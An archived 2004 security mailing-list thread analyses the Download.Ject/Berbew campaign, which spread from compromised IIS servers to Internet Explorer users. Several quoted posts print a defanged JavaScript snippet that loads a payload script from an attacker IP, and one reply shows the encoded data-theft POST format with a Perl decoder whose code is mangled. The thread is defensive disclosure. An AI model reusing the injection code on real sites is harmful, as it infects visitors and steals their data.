Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
From: insecure [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Date: Fri, 25 Jun 2004 12:36:41 -0500
...
Berbew/Webber/Padodor Trojan, according to Lurhq.
http://www.lurhq.com/berbew.html
This web page mentions:
content:id=crutop|26|vvpupkin0=
The upload is in an encoded format that consists of records that
specify a machine name, a user name, and a web site that includes an
HTML form. For example, if the machine name were BINDVIEW-LAB-17, the
user name were labuser, and the form were on http://www.example.com/,
then the uploaded data would be sent via HTTP POST, and consist of:
id=crutopvvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcsvvpupkin1=asadaeafbeabanbdaqataeacauadvvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn
The POST data is sent to one of the web sites specified in
http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf
The data can be decoded with the following perl script:
#!/usr/bin/perl
use bytes;
$i = STDIN;
chomp($i);
@r = split /\/, $i;
for ($i = 0; $i = $#r; ++$i)
{
next if ($r[$i] !~ /^vvpupkin/);
@p = split /=/, $r[$i];
for ($j = 0; $j length($p[1]) / 2; ++$j)
{
$c1 = substr($p[1], 2 * $j, 1);
$c2 = substr($p[1], (2 * $j) + 1, 1);
$o1 = ord($c1) - ord(a);
$o2 = ord($c2) - ord(a);
print chr(((26 * $o1) + $o2) ^ 113);
}
print \n;
}
The output of the perl script is:
crutop|BINDVIEW-LAB-17
crutop|labuser
crutop|http://www.example.com/ FORM_0
Matt Power
BindView Corporation, RAZOR Team
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Just a reminder. This isn't the first time this has happened: http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675 -- Gary Flynn Security Engineer James Madison University ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.
Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.
Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients
Hi all,
This is a heads up.
A new malware has been reported from several sources so it appears to be
fairly widespread already.
The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).
The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:
script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location= java script:'SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]
I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in the
following order:
shellscript_loadxxx.js
shellxxx.js
The shellxxx.js will try to drop msits.exe (51.712 bytes) a
trojan-downloader and run it.
Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.
Further information can be found in the daily log from SANS:
http://isc.sans.org/
Regards
Peter Kruse
http://www.csis.dk
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
With the current (in)security of most (if not all) ISP that provide ASP.Net or ASP Classic shared hosting services, all the attakers need to do is to get an hosting account in a shared hosting server (trivial) and infect these websites from the inside. I haven't heard of any new IIS exploit (which doesn't mean that they don't exist), but compromizing the IIS box from the inside (as seen by the interland story) is probably how this happened. BTW, do you know which ISP hosts the 'compromized' websites? Dinis Cruz .Net Security Consultant DDPlus On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote Just a reminder. This isn't the first time this has happened: http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675 -- Gary Flynn Security Engineer James Madison University ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Scanned by Emailfiltering.co.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicuous
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.
Important Customers who have deployed Windows XP Service Pack 2 RC2
are not
at risk.
Reports indicate that Web servers running Windows 2000 Server and IIS
that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to
attempt
to infect users of Internet Explorer with malicious code.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter
Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there
jump to
clients
Hi all,
This is a heads up.
A new malware has been reported from several sources so it appears
to be
fairly widespread already.
The malware spreads from infected IIS servers to clients that visit
the
webpage of the infected server. How the IIS servers was compromised
in the
first place is unfortunately still unknown (any info on that would
be
appreciated).
The malware redirects a visitor to http: //217.107.218.147/xxx.php.
It does
so by running a javascript that apparently gets appended to several
files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:
script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location= java script:'SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]
I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in
the
following order:
shellscript_loadxxx.js
shellxxx.js
The shellxxx.js will try to drop msits.exe (51.712 bytes) a
trojan-downloader and run it.
Consider to deny access to http://217.107.218.147 in your firewall.
This
will at least prevent client PCs from getting infected.
Further information can be found in the daily log from SANS:
http://isc.sans.org/
Regards
Peter Kruse
http://www.csis.dk
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-END PGP SIGNATURE-
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messengerl=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about.php?subloc=affiliatel=427
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Berbew/Webber/Padodor Trojan, according to Lurhq.
http://www.lurhq.com/berbew.html
joe wrote:
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.
Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.
Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients
Hi all,
This is a heads up.
A new malware has been reported from several sources so it appears to be
fairly widespread already.
The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).
The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:
script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location= java script:'SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]
I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in the
following order:
shellscript_loadxxx.js
shellxxx.js
The shellxxx.js will try to drop msits.exe (51.712 bytes) a
trojan-downloader and run it.
Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.
Further information can be found in the daily log from SANS:
http://isc.sans.org/
Regards
Peter Kruse
http://www.csis.dk
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Peter Kruse [EMAIL PROTECTED] wrote:
This is a heads up.
Or...
PANIC, PANIC, PANIC...
A new malware has been reported from several sources so it appears to be
fairly widespread already.
The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).
There is _no_ evidence (yet) that this is spreading from infected IIS
servers. _Some_ IIS admins whose servers are involved don't know how
the content got on their servers, but that is far from grounds for
claiming said servers are, or even may be, infected. Of course they
might be, but history suggests that slack admin'ing is at least as
likely as an explanation...
The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:
script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location= java script:'SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]
I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in the
following order:
shellscript_loadxxx.js
shellxxx.js
The shellxxx.js will try to drop msits.exe (51.712 bytes) a
trojan-downloader and run it.
It does this via the now very old ms-its: protocol zone-handling bug...
Apparently someone needs to decode a few more levels of JavaScript, etc
to work this all out...
Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.
Thanks Peter, but what about all the _other_ servers out there also
hosting more or less exactly the same files? Are you going to provide
a list of all those IPs too?
I've seen several (probably 5 or 6 others) in the last week or so with
all the same files or just one difference (ignoring the trivial script
differences necessitated by referring to different hosts) -- the .EXE
that is eventually downloaded is a different variant.
Further information can be found in the daily log from SANS:
http://isc.sans.org/
Woohoo -- SANS incident handlers have reported one incident of this
they know about so the sky must be falling!
Next...
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
